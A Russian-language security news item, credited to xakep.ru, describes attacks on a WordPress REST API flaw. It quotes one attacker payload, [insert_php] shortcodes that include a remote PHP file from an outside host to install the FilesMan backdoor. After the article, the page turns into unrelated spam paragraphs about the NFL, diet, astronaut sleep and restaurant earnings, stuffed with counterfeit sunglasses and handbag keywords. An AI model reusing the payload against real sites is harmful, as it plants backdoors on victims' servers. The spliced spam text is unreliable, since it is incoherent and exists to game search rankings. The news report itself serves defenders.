Атаки на уязвимость в WordPress REST API используются для установки бэкдоров.

Здесь может быть ваша реклама

Массовые атаки на свежую уязвимость в WordPress REST API, исправленную в конце января 2017 года, продолжаются. На прошлой неделе мы рассказывали, что по данным компании WordFence, уязвимость привлекла внимание как минимум 20 хакерских групп, которым удалось скомпрометировать более 1,5 млн страниц. В настоящий момент количество пострадавших страниц перевалило за два миллиона, а атаки постепенно становятся серьезнее, как и прогнозировали специалисты.

Напомню, что свежая уязвимость была устранена с выходом WordPress 4.7.2, еще 26 января 2017 года. Баг обнаружили специалисты компании Sucuri, и они описывают его как неавторизованную эскалацию привилегий через REST API. Уязвимости подвержены версии 4.7.0 и 4.7.1. Однако публичное раскрытие информации о проблеме состоялось только неделю спустя, так как разработчики хотели, чтобы как можно больше сайтов спокойно установили обновления.

Уязвимость позволяет неавторизованному атакующему сформировать специальный запрос, при помощи которого можно будет изменять и удалять содержимое любого поста на целевом сайте. Кроме того, используя шорткоды плагинов, злоумышленник может эксплуатировать и другие уязвимости CMS, которые обычно недоступны даже пользователям с высокими привилегиями. В итоге атакующий может внедрить на страницы сайта SEO-спам, рекламу, и даже исполняемый PHP-код, все зависит от доступных плагинов.

Эксперты компании Sucuri заметили, что от простых дефейсов злоумышленники перешли к попыткам удаленного выполнения произвольного кода. Для этих целей хакеры используют плагины Insert PHP (100 000+ установок), Exec-PHP (100 000+ установок) и им подобные. Такие плагины позволяют внедрять PHP-код в посты, чтобы сделать кастомизацию проще.

Исследователи пишут, что теперь дефейс-сообщения хакеров содержат шорткоды для вышеупомянутых плагинов. То есть добавив к своим дефейсам PHP-код, злоумышленники могут добиться его выполнения. В блоге компании эксперты приводят следующий пример, замеченный ими в ходе изучения атак:

content:»[insert_php] include(‘http[:]//acommeamour.fr/tmp/xx.php’); [/insert_php]
[php] include(‘http[:]//acommeamour.fr/tmp/xx.php’); [/php]»,

Данный пример приводит к скачиванию бэкдора FilesMan и его установке в директорию /wp-content/uploads/.

Теперь специалисты Sucuri рекомендуют администраторам отключить все потенциально опасные плагины и обновиться до WordPress 4.7.2, если они по какой-то причине еще этого не сделали. Исследователи поясняют, что такие атаки – это способ монетизации уязвимости. Тогда как обычными дефейсами много не заработаешь, размещение бекдора на сервере жертвы позволяет злоумышленникам вернуться позже, даже после устранения оригинальной уязвимости, и разместить на скомпрометированном ресурсе SEO-спам, рекламу или малварь.

Источник — xakep.ru

Yesterday the cheap ray bans NFL approved several new rules for the 2013 season including one that will penalise its players for tackling each other using the crown of their helmets. The move is aimed at improving player safety, and is a direct response to the intimidating 4,000+ lawsuits the NFL is facing from former players who say that league safety rules have left them suffering from long cheap oakleys term head trauma.. He also watches the defensive players the back is blocking. He makes calls determining if a player is in or out of bounds. Said more simply, include fruits, vegetables, leafy greens, whole grains, lean meats and fish in your diet. To help make grocery shopping easier, try primarily shopping the perimeter of the store where they keep the fresh produce and meat counter.10 Surprising Flat Belly Foods. That’s what I want people to understand, you can’t just wish harm on somebody because they have different beliefs than you. Everyone didn’t grow up the same.». They’re weapons cheap China Jerseys and tools, and they’re needed to dig for water and roots and to battle for the love of a lady. Maybe you’ve given him a monocle, named him Dr. Opposing teams should know what they do. When United teams played against Totti, albeit a few years ago now, we knew that Roma tried to get the ball to their captain early and play off him. That free for all attitude makes it easy to add thousands of calories to your plate. While occasional splurging isn typically harmful, Giblin suggests avoiding the tendency to turn one feast into a month long party. Brady, the New England Patriots’ star quarterback, has denied involvement. Settlement talks have continued this week.Doty has ruled in the NFLPA’s favor numerous times through the years, including his February decision to vacate the arbitration award that upheld Peterson’s hockey jerseys suspension. I wrestled through elementary school and middle school. Never had I needed a cup for it. King is still very dependent on Candy Crush Saga. However, King does NOT pay any royalty for its top grossing game. Darren Sproles ($5,400) Great value here for this possible Hall of Famer. He draws Green Bay on Monday night. Receivers must avoid opponents who fake oakleys try to block or intercept balls. They fake or run away from opponents oakleys outlet to get in the clear to make a catch. Raiders 30 6.USA TODAYTom Brady, Patriots keep Jets in check in AFC East6. Kirk Cousins drove the Redskins down the field to win the game and maybe saveJay fake ray bans Gruden’s job for now in the final minute to complete the largest comeback in the 83 year history of the franchise.7.
Parents like you are responsible for an entire generation that expects the world handed to them, because you have given it to them all along. Instead of teaching your kids to work hard and earn things, you give a trophy to every kid in youth sports and then hand them an iPhone in middle school. You are the parents screaming through the fence at the Little League umpire instead of teaching good sportsmanship. Circadian phase has been previously studied in only a small number of astronauts. Using actigraphy and photometry data from the largest study of sleep ever conducted during spaceflight and a model to estimate circadian phase, we aimed to quantify the frequency and timing of circadian misalignment during the preflight interval and relative to mission critical events during long duration spaceflight on the ISS. We further aimed to assess the impact of circadian misalignment on sleep cheap oakleys sunglasses duration, quality, and medication use.. 2. Take a five minute after meal walk. Moving your body helps release air that has been cheap jordan trapped in your GI tract, relieving pressure and bloating. To increase the intensity, you can grab a set of hand weights so that you’re now pushing up more weight against gravity to increase the intensity on the muscle group, and/or you can slightly elevate the toes on the front foot. So now I’ve added a balance challenge. I sink down and push up. Buffalo Wild Wings’ fans continued to support our fast paced new restaurant growth, and we increased our presence in North America with 20 additional restaurants, including the opening of our 900th location in the first quarter. Our teams were focused on engaging our guests and creating our unique Buffalo Wild Wings experience, particularly during major sporting events like post season football and college basketball. wholesale nfl jerseys Our same store sales were especially Cheap Jordan Shoes strong on Super Bowl Sunday and during March Madness tournaments.. As a kid, kate spade outlet a candy necklace or cheap oakley sunglasses bracelet marc by marc jacobs one of my coach factory outlet online favorite things, it prada black friday was a rarity, but cheap oakley sunglasses when I had one, it ray ban sunglasses felt like oakley replica oakleys sunglasses morning. Coach outlet store online protestors from People forcoach factory outlet the ray ban black friday of Animals, michael kors outlet, and the ray ban sunglasses cheap to michael kors handbags Drawn Carriages swarmed louis vuitton black friday Park oakley sunglasses cheap of carriage horses, which coach factory outlet de kate spade black friday seeks to ban. New michael kors oakley black friday Week is tory burch outlet online down, but we still louis vuitton outlet online of the attendees louis vuitton handbags for coach outlet store online pleasure.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *